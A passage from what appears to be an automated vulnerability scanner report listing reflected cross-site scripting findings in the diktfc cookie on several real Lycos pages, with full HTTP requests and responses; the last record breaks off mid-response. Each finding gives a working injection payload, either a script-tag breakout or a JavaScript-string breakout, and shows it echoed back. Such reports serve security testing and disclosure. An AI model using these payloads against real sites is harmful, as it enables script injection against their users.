P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Subs
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos-subs.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A28f28";alert(1)//65e76e87880.lycos.com"
});
</script>
...[SNIP]...

1.358. http://info.lycos.com/tos-subs.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-subs.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c1"><script>alert(1)</script>eb4451887f8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos-subs.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c1"><script>alert(1)</script>eb4451887f8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Subs
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos-subs.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c1"><script>alert(1)</script>eb4451887f8.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.359. http://info.lycos.com/tos-tm.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-tm.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbdeb"><script>alert(1)</script>02352f01be0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos-tm.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abbdeb"><script>alert(1)</script>02352f01be0; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos-tm.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abbdeb"><script>alert(1)</script>02352f01be0.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.360. http://info.lycos.com/tos-tm.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-tm.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b7e6"%3balert(1)//12235f6b35c was submitted in the diktfc cookie. This input was echoed as 3b7e6";alert(1)//12235f6b35c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos-tm.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b7e6"%3balert(1)//12235f6b35c; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos-tm.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b7e6";alert(1)//12235f6b35c.lycos.com"
});
</script>
...[SNIP]...

1.361. http://info.lycos.com/tos.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f772"%3balert(1)//8a55a70c6c9 was submitted in the diktfc cookie. This input was echoed as 3f772";alert(1)//8a55a70c6c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f772"%3balert(1)//8a55a70c6c9; PENTA=174.121.222.18.1292163891850882

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f772";alert(1)//8a55a70c6c9.lycos.com"
});
</script>
...[SNIP]...

1.362. http://info.lycos.com/tos.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2e7"><script>alert(1)</script>527175ce7c7 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e7"><script>alert(1)</script>527175ce7c7; PENTA=174.121.222.18.1292163891850882

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e7"><script>alert(1)</script>527175ce7c7.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.363. http://peoplesearch.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53348"><script>alert(1)</script>06140d2ed1c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?tab=people HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A53348"><script>alert(1)</script>06140d2ed1c; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=peoplesearch.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A53348"><script>alert(1)</script>06140d2ed1c.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.364. http://peoplesearch.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93dbb"%3balert(1)//50c42141ad8 was submitted in the diktfc cookie. This input was echoed as 93dbb";alert(1)//50c42141ad8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?tab=people HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A93dbb"%3balert(1)//50c42141ad8; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"peoplesearch.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A93dbb";alert(1)//50c42141ad8.lycos.com"
});
</script>
...[SNIP]...

1.365. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd2fc"%3balert(1)//805be358977 was submitted in the diktfc cookie. This input was echoed as fd2fc";alert(1)//805be358977 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd2fc"%3balert(1)//805be358977; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"peoplesearch.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd2fc";alert(1)//805be358977.lycos.com"
});
</script>
...[SNIP]...

1.366. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77ec"><script>alert(1)</script>002fe144ca0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab77ec"><script>alert(1)</script>002fe144ca0; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=peoplesearch.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab77ec"><script>alert(1)</script>002fe144ca0.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.367. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /frontdoor

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2a6"%3balert(1)//a9d857a500e was submitted in the diktfc cookie. This input was echoed as ef2a6";alert(1)//a9d857a500e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /frontdoor HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aef2a6"%3balert(1)//a9d857a500e; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"peoplesearch.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aef2a6";alert(1)//a9d857a500e.lycos.com"
});
</script>
...[SNIP]...

1.368. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /frontdoor

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af04"><script>alert(1)</script>ad74ead34bd was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /frontdoor HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1af04"><script>alert(1)</script>ad74ead34bd; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=peoplesearch.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1af04"><script>alert(1)</script>ad74ead34bd.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.369. http://peoplesearch.lycos.com/index.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /index.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea545"><script>alert(1)</script>6004c137ca9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aea545"><script>alert(1)</script>6004c137ca9; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
